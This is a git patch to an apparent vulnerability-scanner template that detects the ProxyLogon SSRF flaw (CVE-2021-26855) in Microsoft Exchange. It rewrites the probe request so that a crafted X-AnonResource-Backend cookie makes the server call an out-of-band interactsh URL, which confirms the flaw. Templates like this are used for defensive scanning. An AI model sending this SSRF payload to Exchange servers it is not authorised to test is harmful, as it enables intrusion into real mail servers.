From b69cd23cf486049df64b29a574571b36018e4e08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 21:24:09 +0530 Subject: [PATCH] minor updates --- cves/2021/CVE-2021-26855.yaml | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f5df4f2484..9c0ce7bd98 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange + tags: cve,cve2021,ssrf,rce,exchange,oob reference: | - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse @@ -18,19 +18,10 @@ requests: - | GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3; - Accept-Language: en - Connection: close + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; - matchers-condition: and matchers: - - type: status - status: - - 500 - - 503 - - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - 'X-Calculatedbetarget: somethingnonexistent' - part: header \ No newline at end of file + - "http" \ No newline at end of file